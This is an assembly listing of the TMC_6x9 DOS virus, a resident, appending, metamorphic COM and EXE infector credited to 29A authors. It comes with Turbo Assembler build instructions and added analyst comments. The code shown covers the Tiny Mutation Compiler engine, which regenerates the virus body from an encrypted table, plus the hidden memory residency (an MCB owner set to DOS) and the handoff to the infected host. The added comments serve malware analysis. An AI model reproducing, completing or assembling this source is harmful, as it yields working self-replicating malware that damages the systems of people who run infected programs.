──────────────────────────────────────────────────────────────[tmc_6x9.asm]───
comment *
                            TMC_6x9                 ▄█████▄ ▄█████▄ ▄█████▄
                         Disassembly by             ███ ███ ███ ███ ███ ███
                   Super/29A and Darkman/29A         ▄▄▄██▀ ▀██████ ███████
                                                    ███▄▄▄▄ ▄▄▄▄███ ███ ███
                                                    ███████ ██████▀ ███ ███

  TMC_6x9 is a 5393 bytes resident appending COM and EXE virus. Infects at
  open file, close file and load and/or execute program. TMC_6x9 has an error
  handler, retro structures and is metamorphic in file and memory using Tiny
  Mutation Compiler v 1.00 [TMC].

  To compile TMC_6x9 with Turbo Assembler v 5.0 type:

    TASM /M TMC_6X9.ASM
    TLINK /x TMC_6X9.OBJ
    EXE2BIN TMC_6X9.EXE TMC_6X9.COM
*

; ---------------------------------------------------------------------------
; Analyst notes (taken from what this listing itself shows):
;  - All data is addressed relative to BP, the "delta offset" loaded by the
;    hand-encoded LEA at code_begin.
;  - A scratch segment obtained through INT 21h/48h is laid out as:
;      es:[02h]   16-bit state word of get_rnd_num
;      es:[04h]   write cursor into block information        (starts at 118h)
;      es:[06h]   write cursor into CALL/JMP/Jcc records     (starts at 2c8h)
;      es:[08h]   write cursor into data-reference records   (starts at 5a8h)
;      es:[0ah]   number of blocks found in the table
;      es:[0ch]   0 during the first table pass, then an offset inside the
;                 generated copy (see exam_tbl_inf)
;      es:[0eh]   length of the generated copy (see correct_i16)
;      es:[10h]   table of blocks, 4 bytes per entry, 0000h terminated
;      es:[730h]  start of the generated copy ("next virus generation")
;  - move_virus tests and then sets the byte at 0000:0501h to 10h; that byte
;    is the only "already resident" check visible in this listing.
;  - The nop/nop/nop runs after conditional jumps match the three 90h bytes
;    the fix-up pass at correct_i16 writes behind a Jcc whose displacement
;    fits in 8 bits.
; ---------------------------------------------------------------------------

.model tiny
.code

; code_begin: entry point. Loads the delta offset, records the PSP segment and
; leaves through terminate unless the program's memory block holds at least
; 1900h paragraphs.
code_begin:
    db 10001101b,00101110b  ; LEA BP,[imm16] (opcode 8dh,2eh)
    dw 100h  ; Delta offset
    cld  ; Clear direction flag
    mov ax,ds  ; AX = segment of PSP for current process
    mov [bp+program_seg],ax  ; Store segment of PSP for current process
    dec ax  ; AX = segment of current Memory Control Block
    mov ds,ax  ; DS = segment of current Memory Control Block
    mov ax,ds:[03h]  ; AX = size of memory block in paragraphs
    cmp ax,1900h  ; Insufficient memory?
    jae resize_mem  ; Above or equal? Jump to resize_mem
    jmp terminate

; resize_mem: remember the current block size, then shrink the program's block
; to new_mcb_size paragraphs (INT 21h/4ah). ES is not loaded in this listing
; before the call, so it is presumably still the PSP segment from program
; start - TODO confirm.
resize_mem:
    push cs  ; Save CS at stack
    pop ds  ; Load DS from stack (CS)
    mov [bp+mcb_size_],ax  ; Store size of memory block in paragraphs
    mov bx,[bp+new_mcb_size]  ; BX = new size in paragraphs
    mov ah,4ah  ; Resize memory block
    int 21h
    jnc allocate_mem  ; No error? Jump to allocate_mem
    jmp terminate

; allocate_mem: request the paragraphs freed above (old size - new size - 1)
; as a scratch segment; gives up if fewer than 267h paragraphs are available.
allocate_mem:
    mov ah,48h  ; Allocate memory
    mov bx,[bp+mcb_size_]  ; BX = size of memory block in paragraphs
    sub bx,[bp+new_mcb_size]  ; Subtract new size in paragraphs
    dec bx  ; BX = number of paragraphs to allocate
    cmp bx,267h  ; Insufficient memory?
    jae allocat_mem  ; Above or equal? Jump to allocat_mem
    jmp terminate
allocat_mem:
    int 21h
    jnc initiali_tmc  ; No error? Jump to initiali_tmc
    jmp terminate

; initiali_tmc: initialise the scratch-segment header (layout in the analyst
; notes above) and start the first pass over tmc_table.
initiali_tmc:
    mov es,ax  ; ES = segment of allocated memory
    add es:[02h],6942h  ; Add 6942h to the get_rnd_num state word (the
                        ; block is freshly allocated; its prior content is
                        ; not set anywhere in this listing)
    mov word ptr es:[0ch],00h  ; No table processed yet
    mov es:[04h],118h  ; Store offset of block information
    mov es:[06h],2c8h  ; Store offset of CALL; JMP; Jcc information
    mov es:[08h],5a8h  ; Store offset of data information
    lea si,[bp+tmc_table]  ; SI = offset of tmc_table
    push si  ; Save SI at stack (popped again in exam_tbl_inf)
    mov bx,730h  ; BX = offset of next virus generation
    jmp initial_tmc
initial_tmc:
    mov di,10h  ; DI = offset of table of blocks
    xor ax,ax  ; Zero AX
    jmp tmc_ini_loop

; tmc_ini_loop: first pass. Walks the decrypted table descriptor by descriptor
; and records where every block starts. Descriptor byte in AL:
;   00h            end of table
;   01h..10h       instruction of AL bytes follows
;   11h..0e7h      data of (AL - 10h) bytes follows
;   0eeh           beginning of block (2-byte identification follows)
;   0efh           end of block
;   other >= 0e8h  CALL / JMP / data reference / Jcc (2-byte identification)
; AX on loop entry is the number of table bytes to skip.
tmc_ini_loop:
    add si,ax  ; SI = offset of block or instruction within table
    call decrypt_byte
    or al,al  ; End of table?
    jz calc_blocks  ; Zero? Jump to calc_blocks
    nop
    nop
    nop
    cmp al,11101000b  ; CALL; JMP; Data reference; Jcc?
    jae exam_block  ; Above or equal? Jump to exam_block
    nop
    nop
    nop
    cmp al,10h  ; Data?
    jbe tmc_ini_loop  ; Below or equal? Jump to tmc_ini_loop
    nop
    nop
    nop
    sub al,10h  ; AL = length of data
    jmp tmc_ini_loop
exam_block:
    cmp al,11101111b  ; End of block?
    jne exam_block_  ; Not equal? Jump to exam_block_
    nop
    nop
    nop
    mov al,00h  ; Don't add anything to offset within table
    jmp tmc_ini_loop
exam_block_:
    cmp al,11101110b  ; Beginning of block?
    jne next_byte  ; Not equal? Jump to next_byte
    nop
    nop
    nop
    mov ax,si  ; AX = offset of block identification
    dec ax  ; AX = offset of block within table
    stosw  ; Store offset of block within table
    mov ax,0ffffh  ; Block is still in one part
    stosw  ; Store block information (0ffffh; tested in exam_bloc)
    mov ax,02h  ; Add two to offset within table
    jmp tmc_ini_loop
next_byte:
    mov al,02h  ; Add two to offset within table
    jmp tmc_ini_loop

; calc_blocks: DI - 10h is the byte length of the table of blocks.
calc_blocks:
    lea ax,[di-10h]  ; AX = number of blocks multiplied by four
; Continuation of calc_blocks (its first instruction, lea ax,[di-10h], is on
; the preceding source line): turn the byte length of the table of blocks into
; an entry count, terminate the table and start emitting with the first block.
    shr ax,01h  ; Divide by two
    shr ax,01h  ; Divide by two again: AX = number of blocks
    mov es:[0ah],ax  ; Store number of blocks
    xor ax,ax  ; End of table
    stosw  ; Store end of table
    mov di,10h  ; DI = offset of table of blocks
    mov si,es:[di]  ; SI = offset of block within table
    jmp exam_bloc

; split_block: pick a random entry in the table of blocks (index taken from
; rnd_in_range with BP = number of blocks, scaled to 4-byte entries).
split_block:
    push bp  ; Save BP at stack
    mov bp,es:[0ah]  ; BP = number of blocks
    call rnd_in_range
    pop bp  ; Load BP from stack
    shl ax,01h  ; Multiply random number with two
    shl ax,01h  ; Multiply random number with two
    add ax,10h  ; Add 10h, the offset of the table of blocks
    mov di,ax  ; DI = random offset within table
    jmp exam_nxt_blo

; exam_nxt_blo / exam_block__: starting after the random entry, step through
; the table of blocks (wrapping at the 0000h terminator) until an entry is
; found whose current table byte is not "end of block". When the scan returns
; to its starting entry, every block is finished and exam_tbl_inf takes over.
exam_nxt_blo:
    add di,04h  ; DI = offset of next entry within table of blocks
    mov si,es:[di]  ; SI = offset of next block within table
    or si,si  ; End of table?
    jnz exam_block__  ; Not zero? Jump to exam_block__
    nop
    nop
    nop
    mov di,10h  ; DI = offset of table of blocks
    mov si,es:[di]  ; SI = offset of block within table
    jmp exam_block__
exam_block__:
    push ax  ; Save AX at stack
    call decrypt_byte
    dec si  ; Undo the increment done by decrypt_byte
    cmp al,11101111b  ; End of block?
    pop ax  ; Load AX from stack (flags are unaffected)
    jne exam_bloc  ; Not equal? Jump to exam_bloc
    nop
    nop
    nop
    cmp di,ax  ; End of table of blocks?
    jne exam_nxt_blo  ; Not equal? Jump to exam_nxt_blo
    nop
    nop
    nop
    jmp exam_tbl_inf

; exam_bloc: resume a block. If its information word is not 0ffffh it holds
; the offset where the block was interrupted; a JMP imm16 to the current
; output position (BX) is written there to link the two parts.
exam_bloc:
    mov ax,es:[di+02h]  ; AX = block information
    cmp ax,0ffffh  ; Block is still in one part?
    je exam_bloc_  ; Equal? Jump to exam_bloc_
    nop
    nop
    nop
    push di  ; Save DI at stack
    mov di,ax  ; DI = offset of end of first part of block
    mov al,11101001b  ; JMP imm16 (opcode 0e9h)
    stosb  ; Store JMP imm16
    mov ax,bx  ; AX = offset within next virus generation
    dec ax  ; Decrease offset within next virus generation
    dec ax  ; Decrease offset within next virus generation
    sub ax,di  ; Subtract offset of end of first part of block
    stosw  ; Store 16-bit immediate
    pop di  ; Load DI from stack
    jmp exam_bloc_

; exam_bloc_: fetch the next descriptor byte of the current block.
exam_bloc_:
    call decrypt_byte
    cmp al,11101111b  ; End of block?
    jne exam_bloc__  ; Not equal? Jump to exam_bloc__
    jmp end_of_block

; exam_bloc__: before each plain instruction (descriptor <= 10h) draw a random
; number below [probability]; a result of zero interrupts the block here.
; NOTE(review): this listing branches to split_block, while the tmc_table copy
; of the same branch is commented "Jump to split_bloc_" (identification
; 0bc8h). split_block_ further down has no visible reference in this listing -
; confirm which target is intended.
exam_bloc__:
    cmp al,10h  ; Data; CALL; JMP; Data reference...?
    ja exam_bloc___  ; Above? Jump to exam_bloc___
    nop
    nop
    nop
    push ax bp  ; Save registers at stack
    mov bp,[bp+probability]  ; BP = probability
    call rnd_in_range
    or ax,ax  ; Split up block?
    pop bp ax  ; Load registers from stack (flags are unaffected)
    jz split_block  ; Zero? Jump to split_block
    nop
    nop
    nop
    jmp exam_bloc___
exam_bloc___:
    cmp al,11101111b  ; End of block?
    jne exam_blo  ; Not equal? Jump to exam_blo
    jmp end_of_block
exam_blo:
    cmp al,11101000b  ; CALL; JMP; Data reference; Jcc?
    jae exam_data  ; Above or equal? Jump to exam_data
    nop
    nop
    nop
    cmp al,10h  ; Data?
    jbe sto_instruct  ; Below or equal? Jump to sto_instruct
    nop
    nop
    nop
    sub al,10h  ; AL = length of data
    jmp sto_instruct

; sto_instruct / sto_ins_loop: copy AL decrypted bytes from the table to the
; output position BX. A length of zero is not guarded against: CX would wrap
; on the first dec.
sto_instruct:
    xor cx,cx  ; Zero CX
    mov cl,al  ; CL = length of instruction
    push di  ; Save DI at stack
    mov di,bx  ; DI = offset within next virus generation
    jmp sto_ins_loop
sto_ins_loop:
    call decrypt_byte
    stosb  ; Store byte of instruction
    dec cx  ; Decrease counter
    jnz sto_ins_loop  ; Not zero? Jump to sto_ins_loop
    nop
    nop
    nop
    mov bx,di  ; BX = offset within next virus generation
    pop di  ; Load DI from stack
    jmp exam_bloc_

; exam_data: descriptor 0edh (data reference). Appends a record
; {BX - 2, block identification} to the data information; BX - 2 is the
; 16-bit operand at the end of the instruction just emitted, patched later
; in data_ref_loo.
exam_data:
    cmp al,11101101b  ; Data reference?
    jne exam_blo_  ; Not equal? Jump to exam_blo_
    nop
    nop
    nop
    push di  ; Save DI at stack
    mov di,es:[08h]  ; DI = offset within data information
    mov ax,bx  ; AX = offset within next virus generation
    dec ax  ; Decrease offset within next virus generation
    dec ax  ; Decrease offset within next virus generation
    stosw  ; Store offset within next virus generation
    call decrypt_id
    stosw  ; Store block identification
    mov es:[08h],di  ; Store offset within data information
    pop di  ; Load DI from stack
    jmp exam_bloc_

; exam_blo_: descriptor 0eeh (beginning of block). Appends a record
; {BX, block identification} to the block information. The run continues on
; the following source line.
exam_blo_:
    cmp al,11101110b  ; Beginning of block?
    jne sto_call_jmp  ; Not equal? Jump to sto_call_jmp
    nop
    nop
    nop
    push di  ; Save DI at stack
    mov di,es:[04h]  ; DI = offset within block information
    mov ax,bx  ; AX = offset within next virus generation
    stosw  ; Store offset within next virus generation
; Continuation of exam_blo_ (its first instructions are on the preceding
; source line): finish the block-information record, then special-case three
; block identifications: 4c5h (the table itself), 2328h (message) and 0bech
; (probability).
    call decrypt_id
    stosw  ; Store block identification
    mov es:[04h],di  ; Store offset within block information
    cmp ax,4c5h  ; Block identification of tmc_table_?
    jne exam_message  ; Not equal? Jump to exam_message
    nop
    nop
    nop
    ; Block 4c5h: the table is copied verbatim (still encrypted) into the
    ; output rather than being compiled.
    push si  ; Save SI at stack
    mov di,bx  ; DI = offset within next virus generation
    lea si,[bp+tmc_table]  ; SI = offset of tmc_table
    mov cx,(table_end-table_begin)
    rep movsb  ; Move table to top of memory
    mov bx,di  ; BX = offset within next virus generation
    pop si  ; Load SI from stack
    jmp examine_next

; exam_message: block 2328h. When [probability] is below 14h the data item
; that follows is skipped in the table and therefore left out of the output.
exam_message:
    cmp ax,2328h  ; Block identification of message?
    jne exam_probabi  ; Not equal? Jump to exam_probabi
    nop
    nop
    nop
    mov ax,14h  ; Probability of including message
    cmp [bp+probability],ax  ; Include message?
    jae examine_next  ; Above or equal? Jump to examine_next
    nop
    nop
    nop
    call decrypt_byte
    sub al,10h  ; AL = length of message
    mov ah,00h  ; Zero AH
    add si,ax  ; SI = offset of end of message
    jmp examine_next

; exam_probabi: block 0bech. Writes [probability] - 1 into the output (reset
; to 64h once it would drop below 05h) and skips the 3 table bytes that
; describe the stored word.
exam_probabi:
    cmp ax,0bech  ; Block identification of probability?
    jne examine_next  ; Not equal? Jump to examine_next
    nop
    nop
    nop
    mov ax,[bp+probability]  ; AX = probability
    dec ax  ; Decrease probability
    cmp ax,05h  ; Probability too small?
    jae store_probab  ; Above or equal? Jump to store_probab
    nop
    nop
    nop
    mov ax,64h  ; Reset probability
    jmp store_probab
store_probab:
    mov es:[bx],ax  ; Store probability
    add bx,02h  ; Add two to offset within next virus generation
    add si,03h  ; SI = offset of beginning of next descriptor
    jmp examine_next
examine_next:
    pop di  ; Load DI from stack
    call decrypt_byte
    jmp exam_bloc___

; sto_call_jmp: any other descriptor >= 0e8h (CALL, JMP or Jcc). Appends a
; record {BX, target block identification} to the CALL/JMP/Jcc information,
; writes the opcode byte and reserves room for the operand.
sto_call_jmp:
    push ax di  ; Save registers at stack
    mov di,es:[06h]  ; DI = offset within CALL; JMP; Jcc information
    mov ax,bx  ; AX = offset within next virus generation
    stosw  ; Store offset within next virus generation
    call decrypt_id
    stosw  ; Store block identification
    mov es:[06h],di  ; Store offset within CALL; JMP; Jcc information
    pop di ax  ; Load registers from stack
    mov es:[bx],al  ; Store opcode byte of CALL imm16; JMP imm16; Jcc
    add bx,03h  ; Add three to offset within next virus generation
    cmp al,11110000b  ; Jump condition?
; Tail of sto_call_jmp (the compare against 11110000b is on the preceding
; source line): a conditional jump gets five bytes of room instead of three.
    jae jcc_imm8  ; Above or equal? Jump to jcc_imm8
    jmp exam_bloc_
jcc_imm8:
    inc bx  ; Increase offset within next virus generation
    inc bx  ; Increase offset within next virus generation
    jmp exam_bloc_

; split_block_: record the interruption point of the current block and leave
; three bytes for the linking JMP imm16 written in exam_bloc.
; NOTE(review): nothing in this listing branches here; the tmc_table copy
; refers to identification 0bc8h ("split_bloc_") - confirm.
split_block_:
    mov es:[di+02h],bx  ; Store offset within next virus generation
    add bx,03h  ; Add three to offset within next virus generation
    jmp end_of_block
end_of_block:
    dec si  ; Undo the increment done by decrypt_byte
    mov es:[di],si  ; Store offset of block within table
    jmp split_block

; exam_tbl_inf: all blocks of the current table are emitted. After the first
; table (es:[0ch] == 0) the current output offset is stored in es:[0ch] and
; the whole process restarts on the second table; after the second table the
; fix-up passes run.
exam_tbl_inf:
    cmp word ptr es:[0ch],00h
    jne correct_i16  ; End of second table? Jump to correct_i16
    nop
    nop
    nop
    pop si  ; Load SI from stack (offset of tmc_table)
    mov es:[0ch],bx  ; Store offset within next virus generation
    add si,(second_table-first_table)
    jmp initial_tmc

; correct_i16: fix-up pass 1. For every CALL/JMP/Jcc record {offset, target
; identification} look up the target block's output offset and write the
; relative operand.
correct_i16:
    push es  ; Save ES at stack
    pop ds  ; Load DS from stack (ES)
    sub bx,730h  ; Subtract offset of next virus generation
    mov ds:[0eh],bx  ; Store length of virus
    mov si,2c8h  ; SI = offset of CALL; JMP; Jcc information
    mov cx,ds:[06h]  ; CX = offset of end of CALL; JMP; Jcc information
    sub cx,si  ; CX = byte length of CALL; JMP; Jcc information
    shr cx,01h  ; Divide by two
    shr cx,01h  ; Divide by two again: CX = number of records
    jmp jmp_call_loo
jmp_call_loo:
    lodsw  ; AX = offset of instruction within next virus generation
    push ax  ; Save AX at stack
    lodsw  ; AX = block identification of the target
    push cx si  ; Save registers at stack
    mov si,118h  ; SI = offset of block information
    mov cx,ds:[04h]  ; CX = offset of end of block information
    sub cx,si  ; CX = byte length of block information
    shr cx,01h  ; Divide by two
    shr cx,01h  ; Divide by two again: CX = number of blocks
    jmp find_block

; find_block: linear search of the block information for identification AX.
; NOTE(review): there is no "not found" path; when CX reaches zero execution
; falls into found_block with SI one record past the last one compared.
find_block:
    cmp ax,[si+02h]  ; Found block?
    je found_block  ; Equal? Jump to found_block
    nop
    nop
    nop
    add si,04h  ; SI = offset of next block in table
    dec cx  ; Decrease counter
    jnz find_block  ; Not zero? Jump to find_block
    nop
    nop
    nop
found_block:
    mov dx,[si]  ; DX = offset of block
    pop si cx  ; Load registers from stack
    pop bx  ; Load BX from stack (AX)
    mov al,[bx]  ; AL = first byte of instruction
    cmp al,11110000b  ; Jump condition?
    jb sto_call_jm  ; Below? Jump to sto_call_jm
    nop
    nop
    nop
    ; Conditional jump: the table stores the Jcc opcode plus 80h. Emit a
    ; short Jcc followed by three NOPs when the displacement fits in a signed
    ; byte; otherwise emit the inverted Jcc over a JMP imm16 (invert_jcc).
    sub byte ptr [bx],10000000b  ; Restore Jcc imm8 opcode
    inc bx  ; BX = offset of 8-bit immediate
    push dx  ; Save DX at stack
    sub dx,bx  ; Subtract offset within next virus generation
    dec dx  ; Decrease 8-bit immediate
    cmp dx,7fh  ; 8-bit immediate out of range?
    jg invert_jcc  ; Greater? Jump to invert_jcc
    nop
    nop
    nop
    cmp dx,0ff80h  ; 8-bit immediate out of range?
    jl invert_jcc  ; Less? Jump to invert_jcc
    nop
    nop
    nop
    mov [bx],dl  ; Store 8-bit immediate
    inc bx  ; BX = offset of end of Jcc imm8
    mov [bx],1001000010010000b  ; Store two NOPs (90h,90h)
    mov byte ptr [bx+02h],10010000b  ; Store third NOP (90h)
    pop dx  ; Load DX from stack
    jmp correct_i16_
invert_jcc:
    pop dx  ; Load DX from stack
    dec bx  ; BX = offset of Jcc imm8
    xor byte ptr [bx],00000001b  ; Invert the jump condition
    inc bx  ; BX = offset of 8-bit immediate
    mov byte ptr [bx],03h  ; Store 8-bit immediate (skip the 3-byte JMP)
    inc bx  ; BX = offset of JMP imm16
    mov al,11101001b  ; JMP imm16 (opcode 0e9h)
    jmp sto_call_jm
sto_call_jm:
    mov [bx],al  ; Store CALL imm16; JMP imm16
    inc bx  ; BX = offset of 16-bit immediate
    sub dx,bx  ; Subtract offset within next virus generation
    dec dx  ; Decrease 16-bit immediate
    dec dx  ; Decrease 16-bit immediate
    mov [bx],dx  ; Store 16-bit immediate
    jmp correct_i16_

; correct_i16_: next CALL/JMP/Jcc record, then fix-up pass 2 over the
; data-reference records (same lookup, absolute offset minus 730h).
correct_i16_:
    dec cx  ; Decrease counter
    jnz jmp_call_loo  ; Not zero? Jump to jmp_call_loo
    nop
    nop
    nop
    mov si,5a8h  ; SI = offset of data information
    mov cx,ds:[08h]  ; CX = offset of end of data information
    sub cx,si  ; CX = byte length of data information
    shr cx,01h  ; Divide by two
    shr cx,01h  ; Divide by two again: CX = number of records
    jmp data_ref_loo
data_ref_loo:
    lodsw  ; AX = offset of 16-bit operand within next virus generation
    push ax  ; Save AX at stack
    lodsw  ; AX = block identification of the referenced data
    push cx si  ; Save registers at stack
    mov si,118h  ; SI = offset of block information
    mov cx,ds:[04h]  ; CX = offset of end of block information
    sub cx,si  ; CX = byte length of block information
    shr cx,01h  ; Divide by two
    shr cx,01h  ; Divide by two again: CX = number of blocks
    jmp find_block_

; find_block_: same search as find_block, with the same missing "not found"
; path.
find_block_:
    cmp ax,[si+02h]  ; Found block?
    je found_block_  ; Equal? Jump to found_block_
    nop
    nop
    nop
    add si,04h  ; SI = offset of next block in table
    dec cx  ; Decrease counter
    jnz find_block_  ; Not zero? Jump to find_block_
    nop
    nop
    nop
found_block_:
    mov ax,[si]  ; AX = offset of block
    pop si cx  ; Load registers from stack
    pop bx  ; Load BX from stack (AX)
    sub ax,730h  ; Subtract offset of next virus generation
    mov [bx],ax  ; Store 16-bit immediate
    dec cx  ; Decrease counter
    jnz data_ref_loo  ; Not zero? Jump to data_ref_loo
    nop
    nop
    nop
    jmp restore_code

; restore_code: build the hand-over frame that virus_exit pops again. Push
; order: SS, SP, CS, IP of the host, PSP segment, [mcb_size], scratch segment
; (DS). The relative CS and SS values get 10h plus the PSP segment added; 10h
; paragraphs is presumably the 100h-byte PSP - TODO confirm. For a COM host
; (executa_stat == 0) the three saved bytes in origin_code are written back
; to cs:[100h].
restore_code:
    mov ax,[bp+program_seg]  ; AX = segment of PSP for current process
    mov cx,[bp+initial_ss]  ; CX = initial SS (relative value)
    add cx,10h  ; Add 10h to initial SS (relative value)
    add cx,ax  ; Add segment of PSP for current process
    push cx  ; Save CX at stack
    push [bp+initial_sp]  ; Save initial SP at stack
    mov cx,[bp+initial_cs]  ; CX = initial CS (relative value)
    add cx,10h  ; Add 10h to initial CS (relative value)
    add cx,ax  ; Add segment of PSP for current process
    push cx  ; Save CX at stack
    push [bp+initial_ip]  ; Save initial IP at stack
    push ax  ; Save segment of PSP for current process
    push [bp+mcb_size]  ; Save size of memory block in paragraphs
    push ds  ; Save DS at stack
    mov cl,00h  ; COM executable
    cmp [bp+executa_stat],cl
    jne move_virus  ; Not a COM executable? Jump to move_virus
    nop
    nop
    nop
    lea si,[bp+origin_code]  ; SI = offset of origin_code
    mov ax,cs:[si]  ; AX = first two bytes of original code
    mov cs:[100h],ax  ; Store first two bytes of original code
    mov al,cs:[si+02h]  ; AL = last byte of original code
    mov cs:[100h+02h],al  ; Store last byte of original code
    jmp move_virus

; NOTE(review): the run below repeats restore_code with incorrect_ip and
; incorr_code in place of initial_ip and origin_code. No label precedes it and
; it follows an unconditional jmp, so nothing visible in this listing reaches
; it. It continues on the following source line.
    mov ax,[bp+program_seg]  ; AX = segment of PSP for current process
    mov cx,[bp+initial_ss]  ; CX = initial SS (relative value)
    add cx,10h  ; Add 10h to initial SS (relative value)
    add cx,ax  ; Add segment of PSP for current process
    push cx  ; Save CX at stack
    push [bp+initial_sp]  ; Save initial SP at stack
    mov cx,[bp+initial_cs]  ; CX = initial CS (relative value)
    add cx,10h  ; Add 10h to initial CS (relative value)
; Continuation of the unlabelled run that starts on the preceding source line
; (a copy of restore_code that uses incorrect_ip and incorr_code). No label
; precedes it, so nothing visible in this listing reaches it.
    add cx,ax  ; Add segment of PSP for current process
    push cx  ; Save CX at stack
    push [bp+incorrect_ip]  ; Save incorrect IP at stack
    push ax  ; Save segment of PSP for current process
    push [bp+mcb_size]  ; Save size of memory block in paragraphs
    push ds  ; Save DS at stack
    mov cl,00h  ; COM executable
    cmp [bp+executa_stat],cl
    jne move_virus  ; Not a COM executable? Jump to move_virus
    nop
    nop
    nop
    lea si,[bp+incorr_code]  ; SI = offset of incorr_code
    mov ax,cs:[si]  ; AX = first two bytes of incorrect code
    mov cs:[100h],ax  ; Store first two bytes of incorrect code
    mov al,cs:[si+02h]  ; AL = last byte of incorrect code
    mov cs:[100h+02h],al  ; Store last byte of incorrect code
    jmp move_virus

; move_virus: residency check. The byte at 0000:0501h is compared with 10h;
; if it already holds 10h the code goes straight to virus_exit, otherwise the
; marker is written. For analysis: this byte is the only "already resident"
; test visible in this listing.
move_virus:
    xor ax,ax  ; Zero AX
    mov ds,ax  ; DS = segment of DOS communication area (0000h)
    cmp byte ptr ds:[501h],10h
    jne move_virus_  ; Not yet resident? Jump to move_virus_
    jmp virus_exit

; move_virus_: move the generated copy from offset 730h to offset 0 of the
; scratch segment, then shrink the program's block again by the copy's size
; and allocate a block of that size for it.
move_virus_:
    mov byte ptr ds:[501h],10h  ; Set the residency marker
    push es  ; Save ES at stack
    pop ds  ; Load DS from stack (ES)
    mov ax,ds:[0ch]  ; AX = offset stored by exam_tbl_inf
    sub ax,730h  ; Subtract offset of next virus generation
    mov [bp+vir_exit_off],ax  ; Store entry offset used by the retf below
    mov cx,ds:[0eh]  ; CX = length of virus
    mov [bp+virus_length],cx  ; Store length of virus
    mov si,730h  ; SI = offset of next virus generation
    xor di,di  ; Zero DI
    rep movsb  ; Move generated copy to offset 0 of the scratch segment
    mov cl,04h  ; Divide by paragraphs
    shr di,cl  ; DI = length of next virus generation in paragraphs
    inc di  ; Round up by one paragraph
    mov bx,[bp+mcb_size_]  ; BX = size of memory block in paragraphs
    sub bx,[bp+new_mcb_size]  ; Subtract new size in paragraphs
    sub bx,di  ; Subtract length of next virus generation
    dec bx  ; Decrease new size in paragraphs
    dec bx  ; Decrease new size in paragraphs
    cmp bx,di  ; Insufficient memory?
    jae resize_mem_  ; Above or equal? Jump to resize_mem_
    jmp virus_exit
resize_mem_:
    mov ah,4ah  ; Resize memory block (ES = scratch segment)
    int 21h
    jnc allocat_mem_  ; No error? Jump to allocat_mem_
    jmp virus_exit
allocat_mem_:
    mov bx,di  ; BX = number of paragraphs to allocate
    mov ah,48h  ; Allocate memory
    int 21h
    jc virus_exit  ; Error? Jump to virus_exit
    nop
    nop
    nop
    ; The word at offset 01h of a Memory Control Block is its owner field.
    ; Writing 0008h there marks the block as owned by DOS itself, so it is not
    ; released when the host program terminates. For analysis: a block with
    ; owner 0008h that DOS did not allocate is an artefact worth checking in
    ; an MCB chain walk.
    dec ax  ; AX = segment of Memory Control Block of the new block
    mov es,ax  ; ES = segment of Memory Control Block of the new block
    mov word ptr es:[01h],08h  ; Set owner field of the block to 0008h
    inc ax  ; AX = segment of the new block
    mov es,ax  ; ES = segment of the new block
    mov cx,[bp+virus_length]  ; CX = length of virus
    xor si,si  ; Zero SI
    xor di,di  ; Zero DI
    rep movsb  ; Move generated copy into the new block
    push es  ; Save ES at stack (far return segment)
    push word ptr [bp+vir_exit_off]  ; Far return offset
    mov al,[bp+crypt_key]  ; AL = 8-bit encryption/decryption key
    mov ah,byte ptr [bp+sliding_key]  ; AH = low byte of sliding key
    retf  ; Return far: continue in the copy at vir_exit_off

; terminate: plain DOS exit with return code 0, used when a memory
; precondition fails before anything has been generated.
terminate:
    mov ax,4c00h  ; Terminate with return code
    int 21h

; get_rnd_num: returns a 16-bit pseudo-random number in AX. Two reads of port
; 40h (timer counter on PC hardware) are XORed with the state word at
; es:[02h], rotated left by the high byte, and stored back as the new state.
; Preserves CX.
get_rnd_num proc near  ; Get 16-bit random number
    push cx  ; Save CX at stack
    in al,40h  ; AL = 8-bit value read from port 40h
    mov ah,al  ; AH = first value read
    in al,40h  ; AL = second 8-bit value read from port 40h
    xor ax,es:[02h]  ; Mix with stored 16-bit state
    mov cl,ah  ; CL = high-order byte of 16-bit random number
    rol ax,cl  ; AX = 16-bit random number
    mov es:[02h],ax  ; Store 16-bit random number
    pop cx  ; Load CX from stack
    ret  ; Return
endp

; rnd_in_range: returns AX = get_rnd_num mod BP, or 0 when BP is 0.
; Preserves DX.
rnd_in_range proc near  ; Random number within range
    or bp,bp  ; Zero BP?
    jz zero_range  ; Zero? Jump to zero_range
    nop
    nop
    nop
    push dx  ; Save DX at stack
    call get_rnd_num
    xor dx,dx  ; Zero DX
    div bp  ; DX = random number within range
    xchg ax,dx  ; AX = random number within range
    pop dx  ; Load DX from stack
    ret  ; Return
zero_range:
    xor ax,ax  ; AX = random number within range
    ret  ; Return
endp

; decrypt_byte: returns in AL the decrypted table byte at [SI] and advances
; SI. The key byte is the low byte of (index * sliding_key) plus crypt_key,
; where index = SI - BP - offset tmc_table. AH is preserved through ah_.
; The 16-bit mul also writes DX, which is not saved here.
decrypt_byte proc near  ; Decrypt byte of table
    mov [bp+ah_],ah  ; Store AH
    mov ax,si  ; AX = offset within table
    sub ax,bp  ; Subtract delta offset from offset within table
    sub ax,offset tmc_table  ; Subtract offset of tmc_table: AX = index
    mul word ptr [bp+sliding_key]  ; AX = low word of index * sliding key
    add al,[bp+crypt_key]  ; Add 8-bit encryption/decryption key
    xor al,[si]  ; AL = byte of decrypted table
    mov ah,[bp+ah_]  ; AH = stored AH
    inc si  ; Increase offset within table
    ret  ; Return
endp

; decrypt_id: returns in AX the 16-bit block identification at [SI] (low byte
; first in the table) and advances SI by two.
decrypt_id proc near  ; Decrypt block identification in table
    call decrypt_byte
    mov ah,al  ; AH = first decrypted byte
    call decrypt_byte
    xchg al,ah  ; AL = first byte, AH = second byte
    ret  ; Return
endp

; virus_exit: undo the memory set-up and hand control to the host. Pops the
; frame built in restore_code in reverse order: scratch segment (freed), the
; [mcb_size] value and PSP segment (block resized), then IP and CS (patched
; into the far jump below), SP and SS.
virus_exit:
    pop es  ; Load ES from stack (scratch segment)
    mov ah,49h  ; Free memory
    int 21h
    pop bx  ; Load BX from stack (size of memory block in paragraphs)
    pop ax  ; Load AX from stack (segment of PSP)
    mov ds,ax  ; DS = segment of PSP for current process
    mov es,ax  ; ES = segment of PSP for current process
    mov ah,4ah  ; Resize memory block
    int 21h
    lea bx,[bp+jmp_imm32]  ; BX = offset of jmp_imm32
    pop ax  ; Load AX from stack (initial IP)
    mov cs:[bx+01h],ax  ; Store initial IP
    pop ax  ; Load AX from stack (initial CS, already relocated)
    mov cs:[bx+03h],ax  ; Store initial CS
    pop ax  ; Load AX from stack (initial SP)
    pop ss  ; Load SS from stack (initial SS, already relocated)
    mov sp,ax  ; SP = stack pointer
    jmp jmp_imm32

